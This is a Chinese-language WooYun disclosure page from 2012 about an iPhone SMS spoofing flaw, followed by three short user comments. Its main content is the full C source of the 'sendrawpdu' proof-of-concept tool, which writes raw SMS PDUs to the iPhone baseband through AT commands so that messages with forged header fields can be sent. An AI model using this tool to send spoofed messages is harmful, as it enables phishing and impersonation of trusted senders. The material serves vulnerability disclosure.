当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011471

漏洞标题:苹果iphone短信欺骗漏洞

相关厂商:苹果

漏洞作者: 造孽

提交时间:2012-08-28 17:35

修复时间:2012-08-28 17:35

公开时间:2012-08-28 17:35

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

苹果iphone中存在短信欺骗漏洞

详细说明:

/*

sendrawpdu (c) 2012 pod2g

Command line tool, usage: sendrawpdu <PDU data in hex>

- Code based on iphone-elite's sendmodem ( http://code.google.com/p/iphone-elite/wiki/sendmodem )
- Just few modifications for SMS sending and iPhone 4 compatibility.

*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <errno.h>
#include <time.h>
#include <sys/ioctl.h>
#define BUFSIZE (65536+100)
unsigned char readbuf[BUFSIZE];
static struct termios term;
static struct termios gOriginalTTYAttrs;
void sendCmd(int fd, void *buf, size_t size);
void sendStrCmd(int fd, char *buf);
int readResp(int fd);
int initConn(int speed);
void closeConn(int fd);
void sendAt(int fd);
void at(int fd);
void sendCmd(int fd, void *buf, size_t size) {
if(write(fd, buf, size) == -1) {
fprintf(stderr, "sendCmd error. %s\n", strerror(errno));
exit(1);
}
}
void sendStrCmd(int fd, char *buf) {
sendCmd(fd, buf, strlen(buf));
}
int readResp(int fd) {
int len = 0;
struct timeval timeout;
int nfds = fd + 1;
fd_set readfds;
int select_ret;

FD_ZERO(&readfds);
FD_SET(fd, &readfds);

// Wait a second
timeout.tv_sec = 1;
timeout.tv_usec = 500000;

while ((select_ret = select(nfds, &readfds, NULL, NULL, &timeout)) > 0) {
len += read(fd, readbuf + len, BUFSIZE - len);
FD_ZERO(&readfds);
FD_SET(fd, &readfds);
timeout.tv_sec = 0;
timeout.tv_usec = 500000;
}
if (len > 0) {
}
readbuf[len] = 0;
fprintf(stderr,"%s",readbuf);
return len;
}
int initConn(int speed) {
int fd = open("/dev/dlci.spi-baseband.extra_0", O_RDWR | O_NOCTTY);

if(fd == -1) {
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}

ioctl(fd, TIOCEXCL);
fcntl(fd, F_SETFL, 0);

tcgetattr(fd, &term);
gOriginalTTYAttrs = term;

cfmakeraw(&term);
cfsetspeed(&term, speed);
term.c_cflag = CS8 | CLOCAL | CREAD;
term.c_iflag = 0;
term.c_oflag = 0;
term.c_lflag = 0;
term.c_cc[VMIN] = 0;
term.c_cc[VTIME] = 0;
tcsetattr(fd, TCSANOW, &term);

return fd;
}
void closeConn(int fd) {
tcdrain(fd);
tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs);
close(fd);
}
void sendAt(int fd) {
char cmd[5];
sprintf(cmd,"AT\r");
sendCmd(fd, cmd, strlen(cmd));
}
void at(int fd) {
sendAt(fd);
for (;;) {
if(readResp(fd) != 0) {
if(strstr((const char *)readbuf,"OK") != NULL) {
break;
}
}
sendAt(fd);
}
}
int main(int argc, char **argv) {
int fd;
char cmd[1024];
if(argc < 2) {
fprintf(stderr,"usage: %s <pdu data>\n",argv[0]);
exit(1);
}
fd = initConn(115200);
at(fd);
sendStrCmd(fd, "AT+CMGF=0\r");
readResp(fd);
sprintf(cmd, "AT+CMGS=%ld\r", strlen(argv[1])/2 - 1);
sendStrCmd(fd, cmd);
readResp(fd);
sprintf(cmd,"%s\032",argv[1]);
sendStrCmd(fd, cmd);
readResp(fd);
closeConn(fd);
return 0;
}

漏洞证明:

修复方案:

版权声明:转载请注明来源 造孽@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-08-28 18:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    http://radiowar.org/security/iphone%E7%9F%AD%E4%BF%A1%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E6%8A%AB%E9%9C%B2.html这个地方分析得比较详细,是ios在处理短信协议某些特殊头部时导致的问题

  2. 2012-08-28 21:04 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    这样也行啊。。。

  3. 2012-08-29 10:29 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    10086亮了。